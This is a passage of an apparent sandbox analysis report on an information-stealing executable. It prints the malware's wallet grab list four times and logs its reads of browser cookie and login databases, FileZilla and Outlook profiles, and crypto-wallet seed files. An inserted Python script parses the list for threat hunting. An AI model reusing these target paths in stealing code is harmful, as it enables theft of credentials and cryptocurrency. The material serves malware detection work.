Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u2ts.0.exe, 00000002.00000002.2530002197.0000000001A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: Yara match File source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.2874374264.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2614325718.0000000005B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2871918307.0000000001202000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2528909810.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED
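The wallet string recovered from u2ts.0.exe memory above is a fixed-width, pipe-delimited grab list (name|root|subdir|mask|flag, one record per five fields), and the "File opened" lines that follow it show the stealer walking exactly those directories under AppData\Roaming. The script below is an added example, not part of the sandbox report or the malware: it parses a constructed excerpt of that string into records, expands each record to the directory and file pattern the stealer will touch, and checks the expansion against a few of the "File opened" paths from this report. The mapping of root code 1 to AppData\Roaming is confirmed by the report; root code 2 mapping to the user profile root and the meaning of the trailing 0/1 field are assumptions, and the Python names are the author's own.

```python
from dataclasses import dataclass

# Constructed excerpt of the pipe-delimited string recovered from
# u2ts.0.exe memory (first few records only; field layout is
# name|root|subdir|mask|flag, each record terminated by '|').
CONFIG = (
    "Bitcoin Core|1|\\Bitcoin\\wallets\\|wallet.dat|1|"
    "Bitcoin Core Old|1|\\Bitcoin\\|*wallet*.dat|0|"
    "Electrum|1|\\Electrum\\wallets\\|*.*|0|"
    "Exodus\\exodus.wallet|1|\\Exodus\\exodus.wallet\\|seed.seco|0|"
    "Chia Wallet\\wallet|2|\\.chia\\mainnet\\wallet\\|*.*|0|"
)

# Root-folder codes. Code 1 -> %APPDATA% is confirmed by the report's
# "File opened" lines (e.g. \Bitcoin\wallets\ under AppData\Roaming).
# Code 2 -> %USERPROFILE% is an assumption (Chia keeps .chia there);
# the report records no file access for a code-2 entry.
ROOTS = {
    "1": "C:\\Users\\user\\AppData\\Roaming",
    "2": "C:\\Users\\user",
}


@dataclass(frozen=True)
class WalletTarget:
    name: str       # label the stealer uses for this wallet
    root_code: str  # key into ROOTS
    subdir: str     # starts and ends with a backslash
    mask: str       # file pattern inside subdir
    flag: str       # trailing 0/1; its meaning is not established by the report


def parse_wallet_config(s: str) -> list[WalletTarget]:
    """Split the config string into fixed 5-field records."""
    fields = s.split("|")
    if fields and fields[-1] == "":   # the string ends with a separator
        fields.pop()
    if len(fields) % 5:
        raise ValueError(f"malformed config: {len(fields)} fields is not a multiple of 5")
    return [WalletTarget(*fields[i:i + 5]) for i in range(0, len(fields), 5)]


def target_directory(t: WalletTarget) -> str:
    """Directory the stealer will open for this record."""
    return ROOTS[t.root_code] + t.subdir


def target_pattern(t: WalletTarget) -> str:
    """Full path pattern (directory + mask), usable as a hunting glob."""
    return target_directory(t) + t.mask


def match_observed(observed: list[str], targets: list[WalletTarget]) -> dict[str, list[str]]:
    """Map each observed 'File opened' path to the config records that explain it."""
    by_dir: dict[str, list[str]] = {}
    for t in targets:
        by_dir.setdefault(target_directory(t).lower(), []).append(t.name)
    return {p: by_dir.get(p.lower(), []) for p in observed}


# Constructed from the report's "File opened" lines for u2ts.0.exe.
OBSERVED = [
    "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\wallets\\",
    "C:\\Users\\user\\AppData\\Roaming\\Exodus\\exodus.wallet\\",
    "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml",  # FTP client, not in the wallet list
]

if __name__ == "__main__":
    targets = parse_wallet_config(CONFIG)
    for t in targets:
        print(f"{t.name:24} {target_pattern(t)}")
    for path, names in match_observed(OBSERVED, targets).items():
        print(path, "<-", names or "no wallet record")
```

Feeding the full string from the memory dump into parse_wallet_config gives the complete list of directories and masks to hunt for in file-access telemetry; the FileZilla path is left in OBSERVED to show that the same process also reads non-wallet credential stores that this particular config string does not cover.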

Remote Access Functionality

Source: Yara match File source: 2.2.u2ts.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.u2ts.0.exe.3500e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.u2ts.0.exe.3500e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.u2ts.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.u2ts.0.exe.3530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.u2ts.0.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2528909810.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21732000000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21732000000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217294b49f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2172952eb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.2450353895.0000021713EAB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.2874374264.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2614325718.0000000005B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2871918307.0000000001202000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7936, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 5564, type: MEMORYSTR
Source: Yara match File source: 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.2.u2ts.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.u2ts.0.exe.3500e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.u2ts.0.exe.3500e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.u2ts.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.u2ts.0.exe.3530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.u2ts.0.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2528909810.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR
Source: Yara match File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD40B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 2_2_6BD40B40
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC68EA0 sqlite3_clear_bindings, 2_2_6BC68EA0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD40D60 sqlite3_bind_parameter_name, 2_2_6BD40D60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BD40C40 sqlite3_bind_zeroblob, 2_2_6BD40C40
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC663C0 PR_Bind, 2_2_6BC663C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BBF22D0 sqlite3_bind_blob, 2_2_6BBF22D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC660B0 listen,WSAGetLastError, 2_2_6BC660B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Code function: 2_2_6BC6C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 2_2_6BC6C050
